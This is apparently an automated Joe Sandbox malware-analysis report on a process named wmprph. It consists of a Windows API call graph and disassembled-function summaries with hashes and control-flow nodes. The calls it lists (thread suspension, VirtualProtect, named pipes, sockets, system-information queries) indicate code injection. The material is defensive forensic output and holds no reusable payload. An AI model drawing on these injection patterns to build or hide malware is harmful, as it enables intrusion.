171618522d4 GetSystemInfo 33470->33473 33474 17161852305 33473->33474 33475 171618523a4 VirtualAlloc 33474->33475 33476 171618523cf 33474->33476 33475->33474 33475->33476 33476->33467 33478 17161857804 33477->33478 33485 17161863158 33478->33485 33480 1716185782d 33482 17161857879 33480->33482 33489 17161862ec8 33480->33489 33483 171618578bb GetVolumeInformationW 33482->33483 33484 1716185790c 33482->33484 33483->33484 33484->33457 33486 1716186317b 33485->33486 33488 17161863173 33485->33488 33487 171618631dc NtAcceptConnectPort 33486->33487 33486->33488 33487->33488 33488->33480 33490 17161862f11 33489->33490 33491 17161862f67 NtAcceptConnectPort 33490->33491 33492 17161862f1b 33490->33492 33491->33492 33492->33482 33493 17161852978 33494 171618529a6 VirtualProtect 33493->33494 33495 1716185299e 33493->33495 33496 171618529c1 33494->33496 33497 171618529cb 33494->33497 33495->33494 33498 17161852a0d VirtualProtect 33497->33498 33498->33496 33499 7df4839b3cdc 33500 7df4839b3ce9 33499->33500 33501 7df4839b3d54 33499->33501 33500->33501 33502 7df4839b3d1b SetWinEventHook 33500->33502 33502->33501 33503 171618569b8 33504 171618569d4 33503->33504 33505 171618569e2 33504->33505 33506 171618569d9 GetProcAddressForCaller 33504->33506 33506->33505 33507 17161862d80 33508 17161862d90 NtAcceptConnectPort 33507->33508 33509 17161862d9f 33507->33509 33508->33509 33510 171618684c0 SetErrorMode 33511 171618684d4 33510->33511 33512 1716186b936 socket 33511->33512 33513 1716186b97a getsockopt 33512->33513 33514 1716186b9c3 socket 33512->33514 33513->33514 33516 1716186b9e3 33514->33516 33517 7df4839e47b8 33518 7df4839e47ee 33517->33518 33519 7df4839e4b08 33518->33519 33529 7df4839e1708 33518->33529 33523 7df4839e482b 33523->33519 33524 7df4839e4909 calloc 33523->33524 33525 7df4839e4958 33523->33525 33524->33523 33528 7df4839e4a12 33524->33528 33526 7df4839e49e3 SendMessageA 33525->33526 33526->33528 33538 7df4839e2730 NtQuerySystemInformation NtQuerySystemInformation 33528->33538 33530 7df4839e173b 33529->33530 33531 7df4839e1715 33529->33531 33533 7df4839e1740 33530->33533 33531->33530 33532 7df4839e171b RtlAddFunctionTable 33531->33532 33532->33530 33534 7df4839e1760 VirtualProtect 33533->33534 33536 7df4839e176f 33533->33536 33534->33536 33535 7df4839e180d 33535->33523 33536->33535 33537 7df4839e17e9 VirtualProtect 33536->33537 33537->33536 33539 1716185cee0 33540 1716185cef3 33539->33540 33541 1716185cf49 33539->33541 33545 1716185a7e0 33540->33545 33543 1716185cf05 33544 1716185cf28 ReadFile 33543->33544 33544->33541 33546 1716185a800 33545->33546 33547 1716185a847 33545->33547 33546->33547 33548 1716185a86b malloc 33546->33548 33547->33543 33548->33547 33549 7df4839e25d4 NtQuerySystemInformation 33550 7df4839e25f7 33549->33550 33551 7df4839e2613 NtQuerySystemInformation 33550->33551 33552 7df4839e262f 33550->33552 33551->33552 33553 7df4839b8c38 SetErrorMode 33554 7df4839b8c4c 33553->33554 33555 7df4839bc8f2 socket 33554->33555 33556 7df4839bc981 33555->33556 33557 7df4839bc936 closesocket 33555->33557 33558 7df4839bc987 socket 33556->33558 33557->33558 33560 7df4839bc99f 33558->33560 33561 1716185515c 33574 17161862a20 33561->33574 33563 17161855374 33564 171618551b5 33564->33563 33565 17161855367 33564->33565 33577 17161862dac 33564->33577 33586 1716186290c 33565->33586 33570 171618552f2 33583 17161862ddc 33570->33583 33573 17161862dac NtAcceptConnectPort 33573->33570 33575 17161862a30 NtAcceptConnectPort 33574->33575 33576 17161862a45 33574->33576 33575->33576 33576->33564 33578 17161855244 33577->33578 33579 17161862dbc NtAcceptConnectPort 33577->33579 33578->33565 33580 17161862cac 33578->33580 33579->33578 33581 17161855290 33580->33581 33582 17161862cbf NtAcceptConnectPort 33580->33582 33581->33570 33581->33573 33582->33581 33584 17161862df0 33583->33584 33585 17161862dec NtAcceptConnectPort 33583->33585 33584->33565 33585->33584 33587 17161862920 33586->33587 33588 1716186291c NtAcceptConnectPort 33586->33588 33587->33563 33588->33587 33589 1716185cc9c 33590 1716185ccba 33589->33590 33603 1716185cd34 33589->33603 33591 1716185cce0 33590->33591 33592 1716185ce5f 33590->33592 33590->33603 33593 1716185ce2e 33591->33593 33597 1716185ccf7 33591->33597 33594 1716185a7e0 malloc 33592->33594 33595 1716185a7e0 malloc 33593->33595 33596 1716185ce42 33594->33596 33595->33596 33600 1716185ce93 ReadFile 33596->33600 33598 1716185cded 33597->33598 33599 1716185cd2b 33597->33599 33597->33603 33616 1716185bc64 33598->33616 33599->33603 33604 1716185c994 33599->33604 33600->33603 33605 1716185cc66 33604->33605 33615 1716185c9ce 33604->33615 33605->33603 33606 1716185cc4f 33607 1716185a9d4 2 API calls 33606->33607 33607->33605 33608 1716185cbca free 33609 1716185cbd5 33608->33609 33609->33606 33630 1716185c2d0 33609->33630 33611 1716185cbc2 33634 1716186e398 free free 33611->33634 33615->33605 33615->33608 33615->33609 33615->33611 33623 1716186e7e8 free free 33615->33623 33624 1716186dbcc 33615->33624 33617 1716185bc92 33616->33617 33618 1716185bd60 33616->33618 33617->33618 33619 1716185bcb5 OpenFileMappingW 33617->33619 33618->33603 33619->33618 33620 1716185bcd2 MapViewOfFile 33619->33620 33621 1716185bd57 CloseHandle 33620->33621 33622 1716185bcf0 33620->33622 33621->33618 33622->33621 33623->33615 33625 1716186dbe5 33624->33625 33629 1716186dbde 33624->33629 33626 1716186dc24 33625->33626 33627 1716186dc1e free 33625->33627 33625->33629 33626->33629 33635 17161894c3c 33626->33635 33627->33626 33629->33615 33631 1716185c313 33630->33631 33633 1716185c87a 33630->33633 33632 1716185c7c0 VirtualAlloc 33631->33632 33631->33633 33632->33633 33633->33606 33634->33608 33636 17161894c4a 33635->33636 33637 17161894c6c 33635->33637 33636->33637 33638 17161894c65 free 33636->33638 33637->33629 33638->33637 33639 17161852908 33640 1716185295b 33639->33640 33641 1716185291a 33639->33641 33641->33640 33642 1716185293d ResumeThread 33641->33642 33642->33641 33643 1716185bc28 33644 1716185bc2d 33643->33644 33646 1716185bc56 33643->33646 33647 1716185ba4c 33644->33647 33648 1716185ba6d 33647->33648 33649 1716185bb44 CreateWindowExW 33648->33649 33650 1716185bba1 33648->33650 33649->33650 33650->33646 33651 1716185d004 33652 1716185d057 33651->33652 33659 1716185aef0 33652->33659 33654 1716185d07f CreateNamedPipeW 33655 1716185d0c7 33654->33655 33658 1716185d109 33654->33658 33656 1716185d0e0 BindIoCompletionCallback 33655->33656 33657 1716185d0f8 ConnectNamedPipe 33656->33657 33656->33658 33657->33658 33660 1716185af2c 33659->33660 33663 17161862e84 33660->33663 33662 1716185af34 33662->33654 33664 17161862e98 NtAcceptConnectPort 33663->33664 33665 17161862eb2 33663->33665 33664->33665 33665->33662 33666 7df4839b3cb0 33667 7df4839b3cc7 33666->33667 33670 7df4839b2f48 33667->33670 33669 7df4839b3cd5 33671 7df4839b2f6a 33670->33671 33673 7df4839b2f87 33671->33673 33674 7df4839b2e90 NtQuerySystemInformation 33671->33674 33673->33669 33675 7df4839b2eb3 33674->33675 33676 7df4839b2eb9 malloc 33674->33676 33675->33676 33677 7df4839b2ecf NtQuerySystemInformation 33676->33677 33678 7df4839b2eeb 33676->33678 33677->33678 33678->33673 33679 7df4839b4290 33681 7df4839b42c3 33679->33681 33680 7df4839b44c0 33681->33680 33689 7df4839b1708 33681->33689 33685 7df4839b4453 33686 7df4839b449b SendMessageA 33685->33686 33686->33680 33687 7df4839b43f0 calloc 33688 7df4839b42fe 33687->33688 33688->33680 33688->33685 33688->33687 33690 7df4839b1715 33689->33690 33691 7df4839b173b 33689->33691 33690->33691 33692 7df4839b171b RtlAddFunctionTable 33690->33692 33693 7df4839b1740 33691->33693 33692->33691 33694 7df4839b1760 VirtualProtect 33693->33694 33696 7df4839b176f 33693->33696 33694->33696 33695 7df4839b180d 33695->33688 33696->33695 33697 7df4839b17e9 VirtualProtect 33696->33697 33697->33696 33698 7df483a022cc 33700 7df483a022ee 33698->33700 33699 7df483a0276d 33700->33699 33706 7df483a01290 33700->33706 33704 7df483a02754 SetTimer 33704->33699 33705 7df483a02329 33705->33699 33705->33704 33707 7df483a012c3 33706->33707 33708 7df483a0129d 33706->33708 33710 7df483a012c8 33707->33710 33708->33707 33709 7df483a012a3 RtlAddFunctionTable 33708->33709 33709->33707 33711 7df483a012e8 VirtualProtect 33710->33711 33713 7df483a012f7 33710->33713 33711->33713 33712 7df483a01395 33712->33705 33713->33712 33714 7df483a01371 VirtualProtect 33713->33714 33714->33713 33719 171618574f0 33722 17161857528 33719->33722 33720 17161857782 33721 171618575c3 VirtualFree 33721->33722 33722->33720 33722->33721 33723 1716185bef0 33724 1716185bf19 33723->33724 33725 1716185bf29 33724->33725 33726 1716185bf47 LoadLibraryA 33724->33726 33726->33725 33727 1716185262c 33728 1716185265f 33727->33728 33730 17161852680 Thread32First 33728->33730 33734 17161852738 33728->33734 33729 1716185288e 33733 17161852685 33730->33733 33731 17161852771 SuspendThread 33731->33734 33732 1716185272f CloseHandle 33732->33734 33733->33732 33734->33729 33734->33731 33735 1716185698c 33736 171618569a6 33735->33736 33737 171618569b0 33736->33737 33738 171618569ab LoadLibraryA 33736->33738 33738->33737

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00007DF483A01958 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337nativememoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000003.2800458716.00007DF483A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF483A01000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_3_7df483a01000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuerycalloc
                                                                                                                                                  • String ID: H$H
                                                                                                                                                  • API String ID: 874015164-136785262
                                                                                                                                                  • Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                                                  • Instruction ID: 9cd298d0f46793780dd2cf0e65145d2ed2b38fe960d2290b7e8b45b22536f1c5
                                                                                                                                                  • Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                                                                                                                                  • Instruction Fuzzy Hash: 60B1547060CB88CFD754EF18D895AAAB7E5FBD5304F400A2EE58EC3251EB34E5458B86
                                                                                                                                                  Function 0000017161863218 Relevance: 17.0, APIs: 2, Strings: 7, Instructions: 1263COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 17161863218-17161863274 call 171618549e4 3 171618642bb-171618642e1 call 171618649f0 0->3 4 1716186327a-171618632db call 17161856dfc * 3 call 171618532fc call 17161856dfc 0->4 18 171618642a8-171618642a9 4->18 19 171618632e1-17161863bf4 4->19 22 171618642ad-171618642b6 call 17161854a40 18->22 20 17161863d49-17161863d51 19->20 21 17161863bfa-17161863c05 19->21 24 17161863d53-17161863d58 20->24 25 17161863dc4-17161863dd5 20->25 21->20 26 17161863c0b-17161863c19 21->26 22->3 24->25 30 17161863d5a-17161863d64 RtlFormatCurrentUserKeyPath 24->30 28 17161863dd7-17161863def 25->28 29 17161863e2e-17161863e34 25->29 31 17161863d44-17161863d45 26->31 32 17161863c1f-17161863c27 26->32 28->29 45 17161863df1-17161863df9 28->45 34 17161863e36-17161863e37 29->34 35 17161863e5f-17161863e72 29->35 30->25 33 17161863d66-17161863d77 30->33 31->20 32->31 36 17161863c2d-17161863c45 32->36 38 17161863d92-17161863d9a 33->38 39 17161863d79-17161863d85 33->39 40 17161863e39-17161863e58 34->40 35->18 51 17161863e78-17161863e83 35->51 41 17161863d38-17161863d3c 36->41 42 17161863c4b-17161863c4c 36->42 46 17161863d9c-17161863db8 call 17161851000 38->46 60 17161863d87-17161863d90 39->60 61 17161863dbb-17161863dbc 39->61 40->40 47 17161863e5a-17161863e5b 40->47 44 17161863d3e-17161863d3f 41->44 48 17161863c4f-17161863c5f 42->48 44->31 52 17161863e0b 45->52 53 17161863dfb-17161863e09 45->53 46->61 47->35 50 17161863c71-17161863c73 48->50 56 17161863c75-17161863c7a 50->56 57 17161863c61-17161863c6f 50->57 51->18 58 17161863e89-17161863e97 51->58 52->29 59 17161863e0d-17161863e28 52->59 53->29 62 17161863d05-17161863d08 56->62 63 17161863c80 56->63 57->50 58->18 64 17161863e9d-17161863ea5 58->64 59->29 60->46 61->25 67 17161863d15-17161863d24 62->67 68 17161863d0a-17161863d0e 62->68 65 17161863c82-17161863c89 63->65 64->18 66 17161863eab-17161863ecb calloc 64->66 71 17161863ca3-17161863ccf 65->71 72 17161863c8b-17161863c9f 65->72 66->18 73 17161863ed1-17161863ef5 66->73 67->48 70 17161863d2a-17161863d36 67->70 68->67 69 17161863d10-17161863d11 68->69 69->67 70->44 75 17161863cf7-17161863cf8 71->75 76 17161863cd1-17161863ce5 call 17161864a1c 71->76 72->65 74 17161863ca1 72->74 77 17161864014-1716186404f 73->77 78 17161863efb-17161863f0e 73->78 74->62 81 17161863cfd-17161863cfe 75->81 76->75 86 17161863ce7-17161863cf5 76->86 89 171618640a7-171618640b7 77->89 90 17161864051-17161864052 77->90 80 17161863f10-17161863f1a 78->80 83 17161863fe5-17161863ff7 80->83 84 17161863f20-17161863f24 80->84 81->62 83->80 87 17161863ffd-17161864012 83->87 84->83 88 17161863f2a-17161863f74 call 17161864a30 84->88 86->81 87->77 100 17161863f88-17161863f8a 88->100 89->18 99 171618640bd-171618640d3 89->99 91 17161864054-1716186405c 90->91 93 1716186405e-17161864063 91->93 94 17161864089-1716186409d 91->94 93->94 97 17161864065-1716186406e 93->97 94->91 98 1716186409f-171618640a0 94->98 103 17161864071-17161864074 97->103 98->89 104 171618640d5-171618640d6 99->104 105 17161864149-1716186414f 99->105 101 17161863f76-17161863f86 100->101 102 17161863f8c-17161863fa2 100->102 101->100 106 17161863fa4-17161863fac 102->106 107 17161863fe1 102->107 108 17161864076 103->108 109 1716186407d-17161864087 103->109 112 171618640d8-171618640e3 104->112 110 17161864151-17161864155 105->110 111 171618641a2-171618641a9 105->111 106->107 115 17161863fae 106->115 107->83 108->109 109->94 109->103 116 1716186415c-17161864167 110->116 113 17161864256-17161864258 111->113 114 171618641af-171618641cf call 171618532fc 111->114 117 171618640e5-171618640f2 112->117 118 171618640f4-17161864108 112->118 122 17161864284-1716186428d 113->122 123 1716186425a-17161864264 113->123 133 171618641e4-171618641f8 call 171618532fc 114->133 134 171618641d1-171618641e2 call 171618535b8 114->134 121 17161863fb0-17161863fc9 call 17161864a1c 115->121 124 17161864189-171618641a0 116->124 125 17161864169-17161864175 116->125 117->118 132 1716186410c-1716186411b 117->132 118->105 120 1716186410a 118->120 120->112 141 17161863fd5-17161863fdb 121->141 142 17161863fcb-17161863fd1 121->142 122->22 130 1716186428f-171618642a6 call 17161856e0c call 1716185563c 122->130 123->122 129 17161864266-17161864280 123->129 124->111 124->116 125->124 131 17161864177-1716186417e 125->131 129->122 130->22 131->124 137 17161864180-17161864187 131->137 138 1716186411d-1716186413a 132->138 139 1716186413c 132->139 133->113 152 171618641fa-1716186420b call 171618535b8 133->152 134->133 151 1716186420d-17161864223 call 17161862804 134->151 137->124 147 17161864141-17161864143 138->147 139->147 141->107 142->121 146 17161863fd3 142->146 146->107 147->105 147->122 151->113 158 17161864225-17161864235 151->158 152->113 152->151 158->113 160 17161864237-17161864250 158->160 160->113
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentFormatPathUsercalloc
                                                                                                                                                  • String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
                                                                                                                                                  • API String ID: 4207655178-84560671
                                                                                                                                                  • Opcode ID: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                                  • Instruction ID: 8c6884cd063085366d48ab5ac234e76c202e5d36b91e00ab0ab0710cb0eb1827
                                                                                                                                                  • Opcode Fuzzy Hash: 144bb87cf5323e5ca5c5509969d93574830f0e274aa410f43bce18622ad8fb25
                                                                                                                                                  • Instruction Fuzzy Hash: 92A249B051CB988FD3B5DF1898857EAB7E4FB99701F500A2EE48EC3251DB7095858B83
                                                                                                                                                  Function 00007DF483A01CE8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 296processnativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000003.2800458716.00007DF483A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF483A01000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_3_7df483a01000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$CreateFunctionHandleInformationOpenProcessProtectQueryResumeTableThreadValueVirtualVolumefree
                                                                                                                                                  • String ID: -
                                                                                                                                                  • API String ID: 3434737372-2547889144
                                                                                                                                                  • Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                                                  • Instruction ID: c018bc408ab98ab180c659238fffb2d623af72a941e18a8fccdde28ae2351166
                                                                                                                                                  • Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                                                                                                                                  • Instruction Fuzzy Hash: 67917174608A49CBEB54FB64D8B56BB73E5FF94301F40492AE54BC2291DF78E8818782
                                                                                                                                                  Function 0000017161A21F40 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 661memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000003.2817508520.0000017161A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017161A20000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_3_17161a20000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Free$HeapVirtual
                                                                                                                                                  • String ID: c
                                                                                                                                                  • API String ID: 3783212868-112844655
                                                                                                                                                  • Opcode ID: 83730d8e1ac888e5b931a51c0679d54f9ee56ffda02ac71e59fb1e1b8d2a9995
                                                                                                                                                  • Instruction ID: 36bd2f20efb432acd57c9423f8526e6cd748aa4cb6a5a499243186628a3ec4ff
                                                                                                                                                  • Opcode Fuzzy Hash: 83730d8e1ac888e5b931a51c0679d54f9ee56ffda02ac71e59fb1e1b8d2a9995
                                                                                                                                                  • Instruction Fuzzy Hash: 2122043061CAA44BDB6C9E2CC4856F9B7E1FB85301F18856EE8DFC2242DA74D946CB81
                                                                                                                                                  Function 000001716185D004 Relevance: 4.6, APIs: 3, Instructions: 110pipeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2502124517-0
                                                                                                                                                  • Opcode ID: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                                  • Instruction ID: 3bea17ed3e81097a1dba3fe36225e5b3664a81bfbccf92bab30f6f6568ad8cc2
                                                                                                                                                  • Opcode Fuzzy Hash: b1072abd5d2d87ebe3607f0745b4a817757572de37e54cefdeb42629dd895e39
                                                                                                                                                  • Instruction Fuzzy Hash: 50318D30208A089FEB95EF28D8D979AB7E9FB94310F500729E45BC21D4DB74C945DB82
                                                                                                                                                  Function 00007DF4839B2E90 Relevance: 4.5, APIs: 3, Instructions: 40nativeCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986531897.00007DF4839B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839B1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839b1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationQuerySystem$malloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1603438391-0
                                                                                                                                                  • Opcode ID: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                                                  • Instruction ID: c038f2646af914a8bc0291649af9a43641bb20a30abb4a0d87a198a18acfd3c6
                                                                                                                                                  • Opcode Fuzzy Hash: d6f0361b43dcc020633b7375cad3ade070dfb937504ad58392e1959d295d159c
                                                                                                                                                  • Instruction Fuzzy Hash: 1A0119346199958FE798EB24EC68AA677E1FBE4301F944069A44BC22A0DE38D545CB42
                                                                                                                                                  Function 0000017161863158 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 81COMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 287 17161863158-17161863171 288 17161863173-17161863176 287->288 289 1716186317b-1716186317e 287->289 290 1716186320e-17161863216 288->290 291 17161863180-17161863185 289->291 292 1716186318a-1716186319f 289->292 291->290 293 171618631a1-171618631a5 292->293 294 171618631ab-171618631da 292->294 293->294 295 171618631dc-171618631e8 NtAcceptConnectPort 294->295 296 171618631ea 294->296 297 171618631ef-171618631f1 295->297 296->297 298 171618631f3-171618631fd 297->298 299 1716186320c 297->299 300 17161863205 298->300 301 171618631ff-17161863203 298->301 299->290 302 1716186320a 300->302 301->302 302->299
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                  • Opcode ID: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                                  • Instruction ID: 11ef160443097342f4b09d94e573957cd5505a0fc06a0741dffdcab96288c00a
                                                                                                                                                  • Opcode Fuzzy Hash: c5b43eddf7a139210649571aee53adea5981a484dd6b9365d0c1e8096d80dd49
                                                                                                                                                  • Instruction Fuzzy Hash: C921C070708A589FE750EE9C98897A976F8E799702F50093EF90DC3290D7658D48D782
                                                                                                                                                  Function 000001716185262C Relevance: 3.3, APIs: 2, Instructions: 293threadinjectionCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 390 1716185262c-17161852666 call 1716189342c 393 17161852738-1716185273b 390->393 394 1716185266c-17161852680 call 17161893426 Thread32First 390->394 396 17161852741-17161852749 393->396 397 1716185288e-171618528a1 393->397 401 17161852685-1716185268a 394->401 396->397 399 1716185274f-17161852750 396->399 400 17161852752-1716185276b 399->400 406 17161852771-17161852788 SuspendThread 400->406 407 1716185287e-17161852888 400->407 402 17161852716-17161852729 call 17161893420 401->402 403 17161852690-1716185269a 401->403 402->401 411 1716185272f-17161852732 CloseHandle 402->411 403->402 410 1716185269c-171618526a6 403->410 412 17161852796-17161852798 406->412 407->397 407->400 410->402 418 171618526a8-171618526ae 410->418 411->393 413 17161852873-1716185287c 412->413 414 1716185279e-171618527a2 412->414 413->407 416 171618527a4-171618527ae 414->416 417 171618527b0-171618527b1 414->417 419 171618527b4-171618527b6 416->419 417->419 421 171618526d6-171618526dc 418->421 422 171618526b0-171618526d2 418->422 419->413 425 171618527bc-171618527d2 419->425 423 17161852705-17161852712 421->423 424 171618526de-171618526f8 421->424 422->411 428 171618526d4 422->428 423->402 424->411 433 171618526fa-17161852702 424->433 427 171618527d4-171618527e5 425->427 430 171618527e7-171618527ea 427->430 431 171618527fe 427->431 428->423 434 171618527f7-171618527fc 430->434 435 171618527ec-171618527f5 430->435 432 17161852800-1716185280a 431->432 436 17161852862-1716185286a 432->436 437 1716185280c-1716185280e 432->437 433->423 434->432 435->432 436->427 440 17161852870-17161852871 436->440 438 17161852814-17161852821 437->438 439 171618528ad-171618528b1 437->439 441 17161852823-1716185282e 438->441 442 1716185283d 438->442 443 171618528b3-171618528bd 439->443 444 171618528bf-171618528cc 439->444 440->413 445 171618528a2-171618528ab 441->445 446 17161852830-1716185283b 441->446 447 1716185283f-17161852842 442->447 443->444 443->447 448 171618528ce-171618528da 444->448 449 171618528e9-171618528ed 444->449 445->447 446->441 446->442 447->436 452 17161852844-1716185285b 447->452 450 171618528dc-171618528e7 448->450 451 171618528fb-17161852903 448->451 449->442 453 171618528f3-171618528f6 449->453 450->448 450->449 451->447 452->436 453->447
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2983003510.0000017161851000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017161851000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_17161851000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandleSuspendThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1038686644-0
                                                                                                                                                  • Opcode ID: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                                  • Instruction ID: a7e63062827a7eb3965403a9a72bce89e5d1db32b04c01b8c8c550786c69813d
                                                                                                                                                  • Opcode Fuzzy Hash: e6fc7b403535ff93a9b75229e2f7f673d76738b256c9c6644f28f980537d77ee
                                                                                                                                                  • Instruction Fuzzy Hash: 4491C03020CA199BEBA8DB2CD8962B973E6FB59710F144159F44EC7189DF78D842DB82
                                                                                                                                                  Function 00007DF4839E25D4 Relevance: 3.0, APIs: 2, Instructions: 40nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2986967644.00007DF4839E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4839E1000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df4839e1000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationQuerySystem
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3562636166-0
                                                                                                                                                  • Opcode ID: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                                                  • Instruction ID: 360580fc3f779cbb2eb3cc932be461bc58f3f065d92b4a089bbb85bd926fd72a
                                                                                                                                                  • Opcode Fuzzy Hash: aef705ebc4d608f27ba9e125c208f2bfcfdfb1cc7e38d7701445699f42369a9a
                                                                                                                                                  • Instruction Fuzzy Hash: FA01E134618A858FF785FB25DC69B6677E1FBA4301F444529A48BC22A0DFB8D584CB41
                                                                                                                                                  Function 00007DF483A022CC Relevance: 2.0, APIs: 1, Instructions: 450timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000019.00000002.2987398812.00007DF483A01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF483A01000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_25_2_7df483a01000_wmprph.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FunctionProtectTableTimerVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2248422592-0
                                                                                                                                                  • Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                                                  • Instruction ID: b46f5186691d12d438250d7e9ccaa283eed187384bc8ce08c5fcd169e6257eda
                                                                                                                                                  • Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                                                                                                                                  • Instruction Fuzzy Hash: EAE15330608A498FEB59EF28D8A95BA77F1FF98300F14463ED44BC3291DB38E9858741
                                                                                                                                                  Function 000001716185C2D0 Relevance: 1.9, APIs: 1, Instructions: 699memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
